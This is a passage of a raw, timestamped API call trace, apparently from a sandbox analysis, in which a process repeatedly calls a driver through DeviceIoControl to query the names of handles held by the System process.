ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.442] ObReferenceObjectByHandle (in: Handle=0xffffffff80000398, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003868880, HandleInformation=0x0) returned 0x0 [0240.442] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.442] PsReleaseProcessExitSynchronization () returned 0x2 [0240.442] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.442] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.442] ObfDereferenceObject (Object=0xfffffa8003868880) returned 0x1 [0240.442] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.442] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.442] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.442] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x72, lpOverlapped=0x0) returned 1 [0240.442] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.442] PsAcquireProcessExitSynchronization () returned 0x0 [0240.442] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.442] ObReferenceObjectByHandle (in: Handle=0xffffffff8000039c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003870b20, HandleInformation=0x0) returned 0x0 [0240.442] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.442] PsReleaseProcessExitSynchronization () returned 0x2 [0240.442] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.442] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.442] ObfDereferenceObject (Object=0xfffffa8003870b20) returned 0x1 [0240.442] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.443] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.443] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.443] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0240.443] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.443] PsAcquireProcessExitSynchronization () returned 0x0 [0240.443] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.443] ObReferenceObjectByHandle (in: Handle=0xffffffff800003a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003870c70, HandleInformation=0x0) returned 0x0 [0240.443] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.443] PsReleaseProcessExitSynchronization () returned 0x2 [0240.443] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.443] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.443] ObfDereferenceObject (Object=0xfffffa8003870c70) returned 0x1 [0240.443] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.443] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.443] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.443] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.443] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.443] PsAcquireProcessExitSynchronization () returned 0x0 [0240.443] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.443] ObReferenceObjectByHandle (in: Handle=0xffffffff800003bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80038d92b0, HandleInformation=0x0) returned 0x0 [0240.443] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.443] PsReleaseProcessExitSynchronization () returned 0x2 [0240.443] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.444] ObQueryNameString (in: Object=0xfffffa80038d92b0, ObjectNameInfo=0xfffffa800310e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.444] ObfDereferenceObject (Object=0xfffffa80038d92b0) returned 0x2 [0240.444] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.444] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.444] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.444] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xde, lpOverlapped=0x0) returned 1 [0240.444] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.444] PsAcquireProcessExitSynchronization () returned 0x0 [0240.444] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.444] ObReferenceObjectByHandle (in: Handle=0xffffffff800003c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80039047b0, HandleInformation=0x0) returned 0x0 [0240.444] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.444] PsReleaseProcessExitSynchronization () returned 0x2 [0240.444] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.444] ObQueryNameString (in: Object=0xfffffa80039047b0, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.444] ObfDereferenceObject (Object=0xfffffa80039047b0) returned 0x2 [0240.444] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.445] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.445] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.445] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0240.445] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.445] PsAcquireProcessExitSynchronization () returned 0x0 [0240.445] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.445] ObReferenceObjectByHandle (in: Handle=0xffffffff800003d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80028e0b70, HandleInformation=0x0) returned 0x0 [0240.445] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.445] PsReleaseProcessExitSynchronization () returned 0x2 [0240.445] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.445] ObQueryNameString (in: Object=0xfffffa80028e0b70, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.445] ObfDereferenceObject (Object=0xfffffa80028e0b70) returned 0x1 [0240.445] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.446] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.446] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.446] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.446] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.446] PsAcquireProcessExitSynchronization () returned 0x0 [0240.446] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.446] ObReferenceObjectByHandle (in: Handle=0xffffffff800003d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034bdf20, HandleInformation=0x0) returned 0x0 [0240.447] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.447] PsReleaseProcessExitSynchronization () returned 0x2 [0240.447] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.447] ObQueryNameString (in: Object=0xfffffa80034bdf20, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.447] ObfDereferenceObject (Object=0xfffffa80034bdf20) returned 0x2 [0240.447] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.447] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.447] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.447] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0240.447] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.447] PsAcquireProcessExitSynchronization () returned 0x0 [0240.447] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.447] ObReferenceObjectByHandle (in: Handle=0xffffffff800003dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002e64f20, HandleInformation=0x0) returned 0x0 [0240.447] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.447] PsReleaseProcessExitSynchronization () returned 0x2 [0240.448] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.448] ObQueryNameString (in: Object=0xfffffa8002e64f20, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.448] ObfDereferenceObject (Object=0xfffffa8002e64f20) returned 0x1 [0240.448] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.448] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.448] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.448] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0240.448] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.448] PsAcquireProcessExitSynchronization () returned 0x0 [0240.448] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.448] ObReferenceObjectByHandle (in: Handle=0xffffffff800003e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003903e20, HandleInformation=0x0) returned 0x0 [0240.448] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.448] PsReleaseProcessExitSynchronization () returned 0x2 [0240.448] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.448] ObQueryNameString (in: Object=0xfffffa8003903e20, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.448] ObfDereferenceObject (Object=0xfffffa8003903e20) returned 0x1 [0240.449] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.449] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.449] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.449] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x128, lpOverlapped=0x0) returned 1 [0240.449] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.449] PsAcquireProcessExitSynchronization () returned 0x0 [0240.449] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.449] ObReferenceObjectByHandle (in: Handle=0xffffffff800003e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002e696d0, HandleInformation=0x0) returned 0x0 [0240.449] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.449] PsReleaseProcessExitSynchronization () returned 0x2 [0240.449] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.449] ObQueryNameString (in: Object=0xfffffa8002e696d0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.449] ObfDereferenceObject (Object=0xfffffa8002e696d0) returned 0x2 [0240.449] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.449] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.450] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.450] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x128, lpOverlapped=0x0) returned 1 [0240.450] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.450] PsAcquireProcessExitSynchronization () returned 0x0 [0240.450] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.450] ObReferenceObjectByHandle (in: Handle=0xffffffff800003e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80038ebf20, HandleInformation=0x0) returned 0x0 [0240.450] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.450] PsReleaseProcessExitSynchronization () returned 0x2 [0240.450] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.450] ObQueryNameString (in: Object=0xfffffa80038ebf20, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.450] ObfDereferenceObject (Object=0xfffffa80038ebf20) returned 0x2 [0240.450] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.450] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.450] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.450] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0240.451] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.451] PsAcquireProcessExitSynchronization () returned 0x0 [0240.451] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.451] ObReferenceObjectByHandle (in: Handle=0xffffffff800003f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002e6a7d0, HandleInformation=0x0) returned 0x0 [0240.451] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.451] PsReleaseProcessExitSynchronization () returned 0x2 [0240.451] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.451] ObQueryNameString (in: Object=0xfffffa8002e6a7d0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.451] ObfDereferenceObject (Object=0xfffffa8002e6a7d0) returned 0x1 [0240.451] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.451] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.451] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.451] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0240.451] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.451] PsAcquireProcessExitSynchronization () returned 0x0 [0240.451] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.452] ObReferenceObjectByHandle (in: Handle=0xffffffff800003f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80038eb730, HandleInformation=0x0) returned 0x0 [0240.452] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.452] PsReleaseProcessExitSynchronization () returned 0x2 [0240.452] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.452] ObQueryNameString (in: Object=0xfffffa80038eb730, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.452] ObfDereferenceObject (Object=0xfffffa80038eb730) returned 0x2 [0240.452] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.452] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.452] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.452] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x122, lpOverlapped=0x0) returned 1 [0240.452] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.452] PsAcquireProcessExitSynchronization () returned 0x0 [0240.452] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.452] ObReferenceObjectByHandle (in: Handle=0xffffffff80000404, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002e68dc0, HandleInformation=0x0) returned 0x0 [0240.452] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.452] PsReleaseProcessExitSynchronization () returned 0x2 [0240.453] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.453] ObQueryNameString (in: Object=0xfffffa8002e68dc0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.453] ObfDereferenceObject (Object=0xfffffa8002e68dc0) returned 0x2 [0240.453] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.453] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.453] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.453] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xc8, lpOverlapped=0x0) returned 1 [0240.453] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.453] PsAcquireProcessExitSynchronization () returned 0x0 [0240.453] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.453] ObReferenceObjectByHandle (in: Handle=0xffffffff80000408, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80028e0a20, HandleInformation=0x0) returned 0x0 [0240.453] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.453] PsReleaseProcessExitSynchronization () returned 0x2 [0240.453] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.453] ObQueryNameString (in: Object=0xfffffa80028e0a20, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.453] ObfDereferenceObject (Object=0xfffffa80028e0a20) returned 0x1 [0240.454] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.454] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.454] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.454] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xd2, lpOverlapped=0x0) returned 1 [0240.454] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.454] PsAcquireProcessExitSynchronization () returned 0x0 [0240.454] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.454] ObReferenceObjectByHandle (in: Handle=0xffffffff8000040c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: 